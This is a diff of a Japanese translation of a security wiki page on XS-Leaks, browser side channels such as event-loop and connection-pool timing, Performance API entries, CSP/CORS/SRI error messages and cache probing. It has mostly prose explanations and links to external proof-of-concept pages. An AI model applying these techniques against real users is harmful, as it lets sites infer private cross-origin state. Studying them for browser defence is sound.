+JavaScriptは[シングルスレッドのイベントループ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop)の並行モデルで動作し、**同時に1つのタスクしか実行できません**。この特性は、**異なるオリジンからのコードが実行されるのにかかる時間を測定するために悪用できます**。攻撃者は、固定プロパティを持つイベントを継続的にディスパッチすることで、イベントループ内で自分のコードの実行時間を測定できます。これらのイベントは、イベントプールが空のときに処理されます。他のオリジンも同じプールにイベントをディスパッチしている場合、**攻撃者は自分のタスクの実行の遅延を観察することで、これらの外部イベントが実行されるのにかかる時間を推測できます**。遅延を監視するこの方法は、異なるオリジンからのコードの実行時間を明らかにし、機密情報を露出させる可能性があります。
 
 > [!WARNING]
-> 実行タイミングでは、**ネットワーク要因**を**排除**して**より正確な測定**を得ることが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによって。
+> 実行タイミングでは、**ネットワーク要因**を**排除**して**より正確な測定**を得ることが可能です。例えば、ページを読み込む前に使用されるリソースを読み込むことによって。
 
 ### Busy Event Loop <a href="#busy-event-loop" id="busy-event-loop"></a>
 
 - **Inclusion Methods**:
 - **Detectable Difference**: タイミング（一般的にページコンテンツ、ステータスコードによる）
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
-- **Summary:** ウェブ操作の実行時間を測定する1つの方法は、スレッドのイベントループを意図的にブロックし、**イベントループが再び利用可能になるまでの時間を測定する**ことです。ブロッキング操作（長い計算や同期API呼び出しなど）をイベントループに挿入し、その後のコードが実行を開始するまでの時間を監視することで、ブロッキング期間中にイベントループで実行されていたタスクの期間を推測できます。この技術は、タスクが順次実行されるJavaScriptのイベントループのシングルスレッドの性質を利用しており、同じスレッドを共有する他の操作のパフォーマンスや動作に関する洞察を提供できます。
+- **Summary:** ウェブ操作の実行時間を測定する1つの方法は、スレッドのイベントループを意図的にブロックし、**イベントループが再び利用可能になるまでの時間を測定すること**です。ブロッキング操作（長い計算や同期API呼び出しなど）をイベントループに挿入し、その後のコードが実行を開始するまでの時間を監視することで、ブロッキング期間中にイベントループで実行されていたタスクの期間を推測できます。この技術は、タスクが順次実行されるJavaScriptのイベントループのシングルスレッドの性質を利用しており、同じスレッドを共有する他の操作のパフォーマンスや動作に関する洞察を提供できます。
 - **Code Example**:
 
-イベントループをロックして実行時間を測定する技術の大きな利点は、**サイト分離**を回避できる可能性です。**サイト分離**は、異なるウェブサイトを別々のプロセスに分けるセキュリティ機能であり、悪意のあるサイトが他のサイトから機密データに直接アクセスするのを防ぐことを目的としています。しかし、共有イベントループを通じて他のオリジンの実行タイミングに影響を与えることで、攻撃者はそのオリジンの活動に関する情報を間接的に抽出できます。この方法は、他のオリジンのデータに直接アクセスすることに依存せず、むしろそのオリジンの活動が共有イベントループに与える影響を観察することで、**サイト分離**によって確立された保護バリアを回避します。
+実行時間を測定するためにイベントループをロックする技術の大きな利点は、**サイト分離**を回避する可能性です。**サイト分離**は、異なるウェブサイトを別々のプロセスに分離するセキュリティ機能であり、悪意のあるサイトが他のサイトから機密データに直接アクセスするのを防ぐことを目的としています。しかし、共有イベントループを通じて他のオリジンの実行タイミングに影響を与えることによって、攻撃者はそのオリジンの活動に関する情報を間接的に抽出できます。この方法は、他のオリジンのデータに直接アクセスすることに依存せず、むしろそのオリジンの活動が共有イベントループに与える影響を観察することで、**サイト分離**によって確立された保護バリアを回避します。
 
 > [!WARNING]
-> 実行タイミングでは、**ネットワーク要因**を**排除**して**より正確な測定**を得ることが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによって。
+> 実行タイミングでは、**ネットワーク要因**を**排除**して**より正確な測定**を得ることが可能です。例えば、ページを読み込む前に使用されるリソースを読み込むことによって。
 
 ### Connection Pool
 
@@ -258,12 +258,12 @@ JavaScriptは[シングルスレッドのイベントループ](https://develope
 xs-search/connection-pool-example.md
 {{#endref}}
 
-ブラウザはサーバー通信のためにソケットを利用しますが、オペレーティングシステムとハードウェアのリソースが限られているため、**ブラウザは同時に開くことができるソケットの数に制限を設けざるを得ません**。攻撃者はこの制限を次の手順で悪用できます：
+ブラウザはサーバー通信のためにソケットを利用しますが、オペレーティングシステムとハードウェアのリソースが限られているため、**ブラウザは同時接続数に制限を設けざるを得ません**。攻撃者はこの制限を次の手順で悪用できます：
 
-1. ブラウザのソケット制限を確認します。たとえば、256のグローバルソケット。
-2. 255のソケットを長時間占有し、さまざまなホストに255のリクエストを開始して、接続を開いたままにします。
+1. ブラウザのソケット制限を確認します。例えば、256のグローバルソケット。
+2. 255のソケットを長時間占有するために、さまざまなホストに255のリクエストを開始し、接続を完了せずにオープンのままにします。
 3. 256番目のソケットを使用してターゲットページにリクエストを送信します。
-4. 別のホストに257番目のリクエストを試みます。すべてのソケットが使用中であるため（手順2と3に従って）、このリクエストはソケットが利用可能になるまでキューに入れられます。このリクエストが進行するまでの遅延は、ターゲットページのソケットに関連するネットワーク活動に関するタイミング情報を攻撃者に提供します。この推測が可能なのは、手順2の255のソケットがまだ使用中であるため、新たに利用可能なソケットは手順3から解放されたものである必要があるからです。256番目のソケットが利用可能になるまでの時間は、ターゲットページへのリクエストが完了するのにかかる時間に直接関連しています。
+4. 別のホストに257番目のリクエストを試みます。すべてのソケットが使用中であるため（手順2と3に従って）、このリクエストはソケットが利用可能になるまでキューに入れられます。このリクエストが進行するまでの遅延は、攻撃者に256番目のソケット（ターゲットページのソケット）に関連するネットワーク活動のタイミング情報を提供します。この推測が可能なのは、手順2の255のソケットがまだ使用中であるため、新たに利用可能なソケットは手順3から解放されたものである必要があるからです。したがって、256番目のソケットが利用可能になるまでの時間は、ターゲットページへのリクエストが完了するのにかかる時間に直接関連しています。
 
 詳細については、[https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)を参照してください。
 
@@ -272,13 +272,13 @@ xs-search/connection-pool-example.md
 - **Inclusion Methods**: JavaScriptリクエスト
 - **Detectable Difference**: タイミング（一般的にページコンテンツ、ステータスコードによる）
 - **More info**:
-- **Summary:** 前の技術と似ていますが、Google **Chrome**は**同じオリジンに対して6つの同時リクエストの制限**を設けています。もし**5つをブロック**し、次に**6番目の**リクエストを**発信**すると、**タイミング**を測定でき、**被害者ページが**同じエンドポイントに**リクエストを送信**させることに成功すれば、**6番目のリクエスト**は**長く**かかり、検出できます。
+- **Summary:** 前の技術と似ていますが、Google **Chrome**は**同じオリジンへの同時リクエストを6つに制限**します。もし**5つをブロック**し、次に**6番目の**リクエストを**発信**すると、**タイミング**を測定でき、**被害者ページが**同じエンドポイントに**リクエストを送信**させることに成功すれば、**6番目のリクエスト**は**長く**かかり、検出できます。
 
 ## Performance API Techniques
 
 [`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance)は、ウェブアプリケーションのパフォーマンスメトリクスに関する洞察を提供し、[`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API)によってさらに強化されます。Resource Timing APIは、リクエストの期間など、詳細なネットワークリクエストのタイミングを監視することを可能にします。特に、サーバーが応答に`Timing-Allow-Origin: *`ヘッダーを含めると、転送サイズやドメインルックアップ時間などの追加データが利用可能になります。
 
-この豊富なデータは、[`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries)や[`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)などのメソッドを介して取得でき、パフォーマンス関連情報の包括的なビューを提供します。さらに、APIは[`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)から取得したタイムスタンプの差を計算することで、実行時間の測定を容易にします。ただし、Chromeなどの特定のブラウザでは、`performance.now()`の精度がミリ秒に制限される可能性があり、タイミング測定の粒度に影響を与える可能性があります。
+この豊富なデータは、[`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries)や[`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName)などのメソッドを介して取得でき、パフォーマンス関連情報の包括的なビューを提供します。さらに、APIは[`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now)から取得したタイムスタンプの差を計算することによって、実行時間の測定を容易にします。ただし、Chromeなどの特定のブラウザでは、`performance.now()`の精度がミリ秒に制限される可能性があり、タイミング測定の粒度に影響を与える可能性があります。
 
 タイミング測定を超えて、Performance APIはセキュリティ関連の洞察にも利用できます。たとえば、Chromeの`performance`オブジェクトにページが存在するかどうかは、`X-Frame-Options`の適用を示す可能性があります。具体的には、`X-Frame-Options`によってフレーム内でのレンダリングがブロックされているページは、`performance`オブジェクトに記録されないため、ページのフレーミングポリシーに関する微妙な手がかりを提供します。
 
@@ -310,7 +310,7 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** エラーを引き起こすリクエストはマージできません。
 - **Code Example**: [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
 
-この技術は、前述の論文の表に見つかりましたが、技術の説明は見つかりませんでした。ただし、[https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)でソースコードを確認できます。
+この技術は、前述の論文の表に見つかりましたが、技術の説明は見つかりませんでした。ただし、[https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)でソースコードを確認することができます。
 
 ### Empty Page Leak
 
@@ -327,10 +327,10 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Inclusion Methods**: フレーム
 - **Detectable Difference**: ページコンテンツ
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** セキュリティアサーションでXSS Auditorを使用することで、攻撃者は特定のウェブページ要素を、作成したペイロードが監査のフィルタリングメカニズムをトリガーしたときの応答の変化を観察することで検出できます。
+- **Summary:** セキュリティアサーションでXSS Auditorを使用することで、攻撃者は特定のウェブページ要素を、作成したペイロードが監査のフィルタリングメカニズムをトリガーしたときの応答の変化を観察することによって検出できます。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
 
-セキュリティアサーション（SA）において、元々クロスサイトスクリプティング（XSS）攻撃を防ぐために設計されたXSS Auditorは、逆説的に機密情報を漏洩させるために悪用される可能性があります。この組み込み機能はGoogle Chrome（GC）から削除されましたが、SAにはまだ存在します。2013年、BraunとHeiderichは、XSS Auditorが正当なスクリプトを誤ってブロックし、偽陽性を引き起こす可能性があることを示しました。これを基に、研究者たちは情報を抽出し、クロスオリジンページ上の特定のコンテンツを検出する技術を開発しました。この概念はXS-Leaksとして知られ、最初にTeradaによって報告され、Heyesによってブログ投稿で詳述されました。これらの技術はGCのXSS Auditorに特有でしたが、SAではXSS AuditorによってブロックされたページはPerformance APIにエントリを生成しないことが発見され、機密情報が漏洩する可能性がある方法が明らかになりました。
+セキュリティアサーション（SA）において、元々クロスサイトスクリプティング（XSS）攻撃を防ぐために設計されたXSS Auditorは、逆説的に機密情報を漏洩させるために悪用される可能性があります。この組み込み機能はGoogle Chrome（GC）から削除されましたが、SAにはまだ存在します。2013年、BraunとHeiderichは、XSS Auditorが正当なスクリプトを誤ってブロックし、偽陽性を引き起こす可能性があることを示しました。これを基に、研究者たちは情報を抽出し、クロスオリジンページ上の特定のコンテンツを検出する技術を開発しました。この概念はXS-Leaksとして知られ、最初にTeradaによって報告され、Heyesによってブログ投稿で詳述されました。これらの技術はGCのXSS Auditorに特有でしたが、SAではXSS AuditorによってブロックされたページはPerformance APIにエントリを生成しないことが発見され、機密情報が漏洩する可能性がある方法を明らかにしました。
 
 ### X-Frame Leak
 
@@ -351,17 +351,17 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** ダウンロードはPerformance APIにリソースタイミングエントリを作成しません。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
 
-前述のXS-Leakと同様に、**ContentDispositionヘッダーのためにダウンロードされるリソース**も**パフォーマンスエントリを作成しません**。この技術はすべての主要なブラウザで機能します。
+前述のXS-Leakと同様に、ContentDispositionヘッダーによって**ダウンロードされるリソース**も**パフォーマンスエントリを作成しません**。この技術はすべての主要なブラウザで機能します。
 
 ### Redirect Start Leak
 
 - **Inclusion Methods**: フレーム
 - **Detectable Difference**: リダイレクト
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** リソースタイミングエントリはリダイレクトの開始時間を漏洩させます。
+- **Summary:** リソースタイミングエントリはリダイレクトの開始時間を漏洩します。
 - **Code Example**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
 
-いくつかのブラウザの動作を悪用するXS-Leakのインスタンスが見つかりました。これらのブラウザはクロスオリジンリクエストに対して過剰な情報をログに記録します。標準では、クロスオリジンリソースに対してゼロに設定すべき属性のサブセットが定義されています。しかし、**SA**では、ターゲットページによってユーザーが**リダイレクト**されたかどうかを検出することが可能です。Performance APIをクエリし、**redirectStartタイミングデータ**を確認することで実現できます。
+いくつかのブラウザの動作を悪用するXS-Leakのインスタンスが見つかりました。これらのブラウザはクロスオリジンリクエストに対して過剰な情報をログに記録します。標準では、クロスオリジンリソースに対してゼロに設定すべき属性のサブセットが定義されています。しかし、**SA**では、ターゲットページによってユーザーが**リダイレクト**されたかどうかを、**Performance API**を照会し、**redirectStartタイミングデータ**を確認することで検出できます。
 
 ### Duration Redirect Leak
 
@@ -371,7 +371,7 @@ HTTP応答ステータスコードを**区別**することが可能です。な
 - **Summary:** リダイレクトが発生した場合、タイミングエントリの持続時間は負になります。
 - **Code Example**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
 
-GCでは、**リダイレクト**を引き起こすリクエストの**持続時間**は**負**であり、リダイレクトが発生しないリクエストと区別できます。
+GCでは、**リダイレクト**を引き起こすリクエストの**持続時間**は**負**であり、リダイレクトが発生しないリクエストと**区別**できます。
 
 ### CORP Leak
 
@@ -391,7 +391,7 @@ GCでは、**リダイレクト**を引き起こすリクエストの**持続時
 - **Summary:** 特定のオリジンに対してサービスワーカーが登録されているかどうかを検出します。
 - **Code Example**:
 
-サービスワーカーは、オリジンで実行されるイベント駆動型スクリプトコンテキストです。彼らはウェブページのバックグラウンドで実行され、リソースをインターセプト、変更、および**キャッシュ**してオフラインウェブアプリケーションを作成できます。\
+サービスワーカーは、オリジンで実行されるイベント駆動型スクリプトコンテキストです。これらはウェブページのバックグラウンドで実行され、リソースをインターセプト、変更、および**キャッシュ**してオフラインウェブアプリケーションを作成できます。\
 **サービスワーカー**によって**キャッシュされたリソース**が**iframe**を介してアクセスされると、そのリソースは**サービスワーカーキャッシュから読み込まれます**。\
 リソースが**サービスワーカー**キャッシュから**読み込まれたかどうかを検出するために、**Performance API**を使用できます。\
 これもタイミング攻撃で行うことができます（詳細については論文を参照してください）。
@@ -477,7 +477,7 @@ audioElement.onerror = errHandler
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **概要:** セキュリティアサーション(SA)において、CORSエラーメッセージは意図せずリダイレクトされたリクエストの完全なURLを露出します。
+- **要約:** セキュリティアサーション(SA)において、CORSエラーメッセージは意図せずリダイレクトされたリクエストの完全なURLを露出します。
 - **コード例**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
 
 この技術により、攻撃者は**クロスオリジンサイトのリダイレクト先を抽出**することができます。これは、WebkitベースのブラウザがCORSリクエストを処理する方法を利用することによって可能です。具体的には、**CORS対応リクエスト**がユーザーの状態に基づいてリダイレクトを発行するターゲットサイトに送信され、ブラウザがそのリクエストを拒否した場合、**リダイレクトのターゲットの完全なURL**がエラーメッセージ内に開示されます。この脆弱性は、リダイレクトの事実を明らかにするだけでなく、リダイレクトのエンドポイントや含まれる可能性のある**機密のクエリパラメータ**も露出します。
@@ -487,7 +487,7 @@ audioElement.onerror = errHandler
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **概要:** セキュリティアサーション(SA)において、CORSエラーメッセージは意図せずリダイレクトされたリクエストの完全なURLを露出します。
+- **要約:** セキュリティアサーション(SA)において、CORSエラーメッセージは意図せずリダイレクトされたリクエストの完全なURLを露出します。
 - **コード例**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
 
 攻撃者は**冗長なエラーメッセージ**を利用して、クロスオリジンの応答のサイズを推測することができます。これは、サブリソース整合性(SRI)のメカニズムによるもので、整合性属性を使用して、CDNから取得されたリソースが改ざんされていないことを検証します。SRIがクロスオリジンリソースで機能するためには、これらが**CORS対応**である必要があります。さもなければ、整合性チェックの対象にはなりません。セキュリティアサーション(SA)において、CORSエラーXSリークと同様に、整合性属性を持つフェッチリクエストが失敗した後にエラーメッセージをキャプチャできます。攻撃者は、任意のリクエストの整合性属性に**偽のハッシュ値**を割り当てることで、このエラーを意図的に**トリガー**できます。SAでは、結果として得られるエラーメッセージが要求されたリソースのコンテンツ長を意図せず明らかにします。この情報漏洩により、攻撃者は応答サイズの変動を識別でき、洗練されたXSリーク攻撃への道を開きます。
@@ -497,10 +497,10 @@ audioElement.onerror = errHandler
 - **インクルージョンメソッド**: ポップアップ
 - **検出可能な違い**: ステータスコード
 - **詳細情報**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
-- **概要:** CSPで被害者のウェブサイトのみを許可すると、他のドメインにリダイレクトしようとするとCSPが検出可能なエラーをトリガーします。
+- **要約:** CSPで被害者のウェブサイトのみを許可すると、他のドメインにリダイレクトしようとした場合、CSPは検出可能なエラーをトリガーします。
 - **コード例**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
 
-XSリークは、CSPを使用してクロスオリジンサイトが異なるオリジンにリダイレクトされたかどうかを検出できます。このリークはリダイレクトを検出できますが、さらにリダイレクトターゲットのドメインも漏洩します。この攻撃の基本的なアイデアは、**攻撃者サイトでターゲットドメインを許可すること**です。ターゲットドメインにリクエストが発行されると、**リダイレクト**がクロスオリジンドメインに行われます。**CSPは**それへのアクセスをブロックし、**違反レポートを作成してリーク技術として使用します**。ブラウザによっては、**このレポートがリダイレクトのターゲット位置を漏洩する可能性があります**。\
+XSリークは、CSPを使用してクロスオリジンサイトが異なるオリジンにリダイレクトされたかどうかを検出できます。このリークはリダイレクトを検出できますが、さらにリダイレクトターゲットのドメインも漏洩します。この攻撃の基本的なアイデアは、**攻撃者サイトでターゲットドメインを許可する**ことです。ターゲットドメインにリクエストが発行されると、それは**クロスオリジンドメインにリダイレクト**します。**CSPは**それへのアクセスをブロックし、**違反レポートを作成してリーク技術として使用します**。ブラウザによっては、**このレポートがリダイレクトのターゲット位置を漏洩する可能性があります**。\
 最新のブラウザは、リダイレクト先のURLを示しませんが、クロスオリジンリダイレクトがトリガーされたことを検出することはできます。
 
 ### キャッシュ
@@ -508,29 +508,29 @@ XSリークは、CSPを使用してクロスオリジンサイトが異なるオ
 - **インクルージョンメソッド**: フレーム、ポップアップ
 - **検出可能な違い**: ページコンテンツ
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
-- **概要:** キャッシュからファイルをクリアします。ターゲットページを開き、ファイルがキャッシュに存在するかどうかを確認します。
+- **要約:** キャッシュからファイルをクリアします。ターゲットページを開き、ファイルがキャッシュに存在するかどうかを確認します。
 - **コード例:**
 
-ブラウザはすべてのウェブサイトに対して1つの共有キャッシュを使用する場合があります。オリジンに関係なく、ターゲットページが**特定のファイルを要求したかどうかを推測することが可能です**。
+ブラウザは、すべてのウェブサイトに対して1つの共有キャッシュを使用する場合があります。オリジンに関係なく、ターゲットページが**特定のファイルを要求したかどうかを推測する**ことが可能です。
 
-ページがユーザーがログインしている場合にのみ画像を読み込む場合、**リソースを無効にする**（キャッシュされていない場合は、詳細情報リンクを参照）ことができ、**そのリソースを読み込む可能性のあるリクエストを実行し、**（例：過剰なリファラーヘッダーを使用して）**不正なリクエストでリソースを読み込もうとします**。リソースの読み込みが**エラーをトリガーしなかった場合**、それは**キャッシュされていた**からです。
+ページがユーザーがログインしている場合にのみ画像を読み込む場合、**リソースを無効に**し（キャッシュされていない場合は、詳細情報リンクを参照）、そのリソースを読み込む可能性のある**リクエストを実行**し、**不正なリクエスト**（例：過剰なリファラーヘッダーを使用）でリソースを読み込もうとします。リソースの読み込みが**エラーをトリガーしなかった**場合、それは**キャッシュされていた**からです。
 
 ### CSPディレクティブ
 
 - **インクルージョンメソッド**: フレーム
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
-- **概要:** CSPヘッダーディレクティブは、CSP iframe属性を使用してプローブされ、ポリシーの詳細が明らかになります。
+- **要約:** CSPヘッダーディレクティブは、CSP iframe属性を使用して調査でき、ポリシーの詳細を明らかにします。
 - **コード例**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
 
-Google Chrome(GC)の新機能により、ウェブページはiframe要素に属性を設定することで**コンテンツセキュリティポリシー(CSP)**を提案でき、ポリシーディレクティブがHTTPリクエストと共に送信されます。通常、埋め込まれたコンテンツは**これをHTTPヘッダーを介して承認する必要があります**。さもなければ、**エラーページが表示されます**。ただし、iframeがすでにCSPによって管理されており、新たに提案されたポリシーがより制限的でない場合、ページは通常通り読み込まれます。このメカニズムは、攻撃者がエラーページを特定することによってクロスオリジンページの**特定のCSPディレクティブを検出する**ための道を開きます。この脆弱性は修正されたとされていますが、私たちの調査結果は、エラーページを検出できる**新しいリーク技術**が存在することを示唆しており、根本的な問題が完全には解決されていなかったことを示しています。
+Google Chrome(GC)の新機能により、ウェブページはiframe要素に属性を設定することで**コンテンツセキュリティポリシー(CSP)**を提案でき、ポリシーディレクティブがHTTPリクエストと共に送信されます。通常、埋め込まれたコンテンツは**これをHTTPヘッダーを介して承認する必要があり**、さもなければ**エラーページが表示されます**。ただし、iframeがすでにCSPによって管理されており、新たに提案されたポリシーがより制限的でない場合、ページは通常通り読み込まれます。このメカニズムは、攻撃者がエラーページを特定することによってクロスオリジンページの**特定のCSPディレクティブを検出する**ための道を開きます。この脆弱性は修正されたとされていますが、私たちの調査結果は、エラーページを検出できる**新しいリーク技術**が存在することを示唆しており、根本的な問題が完全には解決されていなかったことを示しています。
 
 ### **CORP**
 
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
-- **概要:** クロスオリジンリソースポリシー(CORP)で保護されたリソースは、許可されていないオリジンから取得されるとエラーを発生させます。
+- **要約:** クロスオリジンリソースポリシー(CORP)で保護されたリソースは、許可されていないオリジンから取得されるとエラーを発生させます。
 - **コード例**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
 
 CORPヘッダーは比較的新しいウェブプラットフォームのセキュリティ機能で、設定されると**指定されたリソースへのno-corsクロスオリジンリクエストをブロックします**。ヘッダーの存在は検出可能で、CORPで保護されたリソースは**取得されるとエラーを発生させます**。
@@ -540,7 +540,7 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 - **インクルージョンメソッド**: HTML要素
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
-- **概要**: CORBは、リクエストに**`nosniff`ヘッダーが存在するかどうかを攻撃者が検出できる**ようにします。
+- **要約**: CORBは、リクエストに**`nosniff`ヘッダーが存在する**かどうかを攻撃者が検出できるようにします。
 - **コード例**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
 
 攻撃についての詳細情報はリンクを確認してください。
@@ -550,10 +550,10 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
-- **概要**: Originヘッダーが`Access-Control-Allow-Origin`ヘッダーに反映されている場合、リソースがすでにキャッシュに存在するかどうかを確認できます。
+- **要約**: Originヘッダーが`Access-Control-Allow-Origin`ヘッダーに反映されている場合、リソースがすでにキャッシュに存在するかどうかを確認できます。
 - **コード例**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
 
-**Originヘッダー**が`Access-Control-Allow-Origin`ヘッダーに**反映されている**場合、攻撃者はこの動作を悪用して**CORSモードでリソースを取得しようとする**ことができます。**エラー**が**トリガーされない**場合、それは**ウェブから正しく取得された**ことを意味します。エラーが**トリガーされる**場合、それは**キャッシュからアクセスされた**ことを意味します（エラーは、キャッシュが元のドメインを許可するCORSヘッダーを持つ応答を保存しているために発生しますが、攻撃者のドメインは許可されていません）。\
+**Originヘッダー**が`Access-Control-Allow-Origin`ヘッダーに**反映**されている場合、攻撃者はこの動作を悪用して**CORSモードでリソースを取得**しようとすることができます。**エラー**が**トリガーされない**場合、それは**ウェブから正しく取得された**ことを意味します。エラーが**トリガーされる**場合、それは**キャッシュからアクセスされた**ことを意味します（エラーは、キャッシュが元のドメインを許可するCORSヘッダーを持つ応答を保存しているために発生しますが、攻撃者のドメインは許可されていません）。\
 オリジンが反映されていないがワイルドカードが使用されている場合（`Access-Control-Allow-Origin: *`）、これは機能しません。
 
 ## 読み取り可能な属性技術
@@ -563,32 +563,31 @@ CORPヘッダーは比較的新しいウェブプラットフォームのセキ
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: ステータスコード
 - **詳細情報**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
-- **概要:** GCとSAは、リダイレクトが完了した後に応答のタイプ（opaque-redirect）を確認できます。
+- **要約:** GCとSAは、リダイレクトが完了した後に応答のタイプ（opaque-redirect）を確認できます。
 - **コード例**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
 
-`redirect: "manual"`および他のパラメータを使用してFetch APIを介してリクエストを送信すると、`response.type`属性を読み取ることができ、`opaqueredirect`と等しい場合、応答はリダイレクトでした。
+`redirect: "manual"`および他のパラメータを使用してFetch APIを介してリクエストを送信すると、`response.type`属性を読み取ることができ、もしそれが`opaqueredirect`に等しい場合、応答はリダイレクトでした。
 
 ### COOP
 
 - **インクルージョンメソッド**: ポップアップ
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
-- **概要:** クロスオリジンオープナーポリシー(COOP)で保護されたページは、クロスオリジンの相互作用からのアクセスを防ぎます。
+- **要約:** クロスオリジンオープナーポリシー(COOP)で保護されたページは、クロスオリジンの相互作用からのアクセスを防ぎます。
 - **コード例**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
 
-攻撃者は、クロスオリジンHTTP応答におけるクロスオリジンオープナーポリシー(COOP)ヘッダーの存在を推測することができます。COOPは、外部サイトが任意のウィンドウ参照を取得するのを妨げるためにウェブアプリケーションによって使用されます。このヘッダーの可視性は、**`contentWindow`参照にアクセスしようとすることによって識別できます**。COOPが条件付きで適用されるシナリオでは、**`opener`プロパティ**が明白な指標となります：COOPがアクティブな場合は**未定義**であり、存在しない場合は**定義されています**。
